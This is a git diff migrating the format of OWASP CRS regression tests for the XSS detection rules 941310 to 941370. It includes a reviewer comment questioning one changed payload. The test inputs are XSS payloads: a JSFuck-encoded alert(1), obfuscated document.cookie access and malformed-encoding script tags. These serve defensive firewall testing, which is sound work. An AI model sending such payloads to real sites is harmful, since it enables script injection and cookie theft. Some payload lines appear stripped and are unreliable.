var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" 
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 11 desc: Negative using real world Russian example in 
utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee155e7f6..3c7a1ca8a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941320.yaml tests: - - test_title: 941320-1 + - test_id: 1 desc: "XSS Attack - HTML Tag Handler" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\">" - output: - log_contains: id "941330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941330" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 214a6fed4..d44fff9fb 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml 
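Review bot: The 941320.yaml hunk does more than migrate the format: test 1's payload changes from `data: "var=…"` to `data: "payload="` and a `version: HTTP/1.0` line is added, neither of which the surrounding hunks do. If that was intentional it deserves a mention in the description, and since the rendered data line may have lost characters, the committed value should be checked against the file. The unchanged expectation `log_contains: id "941330"` inside 941320.yaml is also worth confirming now that `name: 941320.yaml` is gone and no `rule_id` is added, because the rule the test is keyed to is no longer stated anywhere in the file.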
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -2,40 +2,36 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941340.yaml tests: - - test_title: 941340-1 + - test_id: 1 desc: "IE XSS Filters - Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - test_title: 941340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 11cd1675f..703485f18 100644 
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,23 +1,21 @@ --- meta: author: "fgsch, azurit" - enabled: true - name: 941350.yaml description: Test rule 941350 +rule_id: 941350 tests: - - test_title: 941350-1 + - test_id: 1 desc: GH issue 1514 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/xx?id=%252bADw-script%252bAD4-" - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941350" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/xx?id=%252bADw-script%252bAD4-" + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941350" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 218cf00ad..0064de5d2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml 
@@ -2,60 +2,55 @@ meta: author: "Christian Folini, azurit" description: None - enabled: true - name: 941360.yaml tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 
941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 405779515..775109d42 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml 
@@ -2,176 +2,164 @@ meta: author: "Andrea Menin, azurit" description: None - enabled: true - name: 941370.yaml tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
- method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 